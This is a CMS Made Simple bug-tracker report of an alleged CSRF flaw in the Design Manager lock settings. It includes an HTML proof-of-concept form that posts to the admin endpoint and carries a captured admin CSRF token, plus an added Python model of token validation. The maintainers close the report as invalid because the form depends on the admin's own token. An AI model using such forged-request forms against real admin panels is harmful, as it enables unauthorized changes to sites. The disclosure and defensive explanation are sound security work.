CMS MADE SIMPLE FORGE

CMS Made Simple Core


[#12315] CSRF on Settings - Design Manager

Created By: rahul gautam (G@merited)
Date Submitted: Fri May 29 07:39:02 -0400 2020

Assigned To: Fernando Morgado (JoMorg)
Version: 2.2.14
CMSMS Version: 2.2.14
Severity: Minor
Resolution: Invalid
State: Closed
Summary:
CSRF on Settings - Design Manager
Detailed Description:
hello,

  I discovered a CSRF vulnerability in Settings - Design Manager.

Steps to reproduce:

1) Capture the request of changing Locking
2) Check all the extracted data and build an HTML page from it, for example:

<html>
  <body>
    <!-- rewrites the displayed URL to "/" without reloading the page -->
    <script>history.pushState('', '', '/')</script>
    <form action="http://cms.pick/cmsms-2.2.14-install/admin/moduleinterface.php"
          method="POST" enctype="multipart/form-data">
      <!-- module/action selector for the Design Manager settings handler
           (the original PoC wrote ',' and '_' as the entities &#44; and &#95;,
           which the browser decodes to the values shown here before submitting) -->
      <input type="hidden" name="mact" value="DesignManager,m1_,admin_settings,0" />
      <!-- the logged-in admin's CSRF token, copied from the captured request -->
      <input type="hidden" name="__c" value="543fbd2ceebe218581e" />
      <input type="hidden" name="m1_submit" value="Submit" />
      <!-- the two lock settings the request changes -->
      <input type="hidden" name="m1_lock_timeout" value="90" />
      <input type="hidden" name="m1_lock_refresh" value="120" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3) Play with the values and change them
4) send it to the admin and click submit request
5) The lockout time is changed for admin

This vulnerability affects the CMS Made Simple latest version (2.2.14) and
below. The vulnerability can be mitigated by using CSRF tokens.


History

Comments
Date: 2020-05-29 10:24
Posted By: Ruud van der Velden (ruudvdvelden)

As far as I can see you're already using the CSRF token of the logged in admin.
(543fbd2ceebe218581e)

So I don't see (yet) how this is a vulnerability.

For it to be a vulnerability it should be exploitable without having access to
the admin user's secret.
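
The check the comment above relies on, as an added example that is not CMSMS's own code: the server accepts the Design Manager settings request only when its `__c` field equals the secret bound to the admin's session. The session layout, the field names in the PoC and the handler below are assumptions for the model; the token value is the one from the report.

```python
import html
import hmac
import re

# Constructed stand-in for the logged-in admin's session. The token is the "__c" value
# from the report's PoC; "csrf_secret" is an assumed key name, not CMSMS's own.
ADMIN_SESSION = {"csrf_secret": "543fbd2ceebe218581e",
                 "lock_timeout": 60, "lock_refresh": 120}

HIDDEN_INPUT = re.compile(r'<input[^>]*name="([^"]*)"[^>]*value="([^"]*)"')

def browser_fields(form_html: str) -> dict:
    """Return what a browser actually posts from the PoC's hidden inputs: the
    HTML entities (&#44; is ',', &#95; is '_') are decoded before submission."""
    return {html.unescape(n): html.unescape(v) for n, v in HIDDEN_INPUT.findall(form_html)}

def csrf_token_valid(session: dict, fields: dict) -> bool:
    """A missing, empty or guessed token fails; the comparison is constant-time."""
    supplied = fields.get("__c", "")
    return bool(supplied) and hmac.compare_digest(supplied, session["csrf_secret"])

def handle_lock_settings(session: dict, fields: dict) -> tuple:
    """Model of the settings handler: refuse unless the CSRF token matches the
    session, then apply only well-formed integer values for the two lock settings."""
    if not csrf_token_valid(session, fields):
        return ("rejected", "csrf token missing or does not match the admin session")
    if fields.get("mact") != "DesignManager,m1_,admin_settings,0":
        return ("rejected", "not a Design Manager settings submission")
    try:
        timeout = int(fields["m1_lock_timeout"])
        refresh = int(fields["m1_lock_refresh"])
    except (KeyError, ValueError):
        return ("rejected", "lock settings must be integers")
    session["lock_timeout"], session["lock_refresh"] = timeout, refresh
    return ("accepted", {"lock_timeout": timeout, "lock_refresh": refresh})

# Constructed copy of the PoC's hidden inputs, entity-encoded exactly as in the report.
POC_FORM = """
<input type="hidden" name="mact" value="DesignManager&#44;m1&#95;&#44;admin&#95;settings&#44;0" />
<input type="hidden" name="&#95;&#95;c" value="543fbd2ceebe218581e" />
<input type="hidden" name="m1&#95;submit" value="Submit" />
<input type="hidden" name="m1&#95;lock&#95;timeout" value="90" />
<input type="hidden" name="m1&#95;lock&#95;refresh" value="120" />
"""

if __name__ == "__main__":
    fields = browser_fields(POC_FORM)
    print(handle_lock_settings(dict(ADMIN_SESSION), fields))   # accepted: carries the real token
    without_token = {k: v for k, v in fields.items() if k != "__c"}
    print(handle_lock_settings(dict(ADMIN_SESSION), without_token))   # rejected
    print(handle_lock_settings(dict(ADMIN_SESSION), {**fields, "__c": "0" * 19}))   # rejected
```

The PoC passes only because it embeds the admin's own token; strip or guess it and the same request is refused, which is why the report was closed as Invalid.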


Date: 2020-05-29 10:31
Posted By: rahul gautam (G@merited)

Oh, for the moment I am sorry; I thought it had something to do with the value of
the settings. I didn't notice that.
Updates

Updated: 2020-09-02 15:07
resolution_id: => 9
state: Open => Closed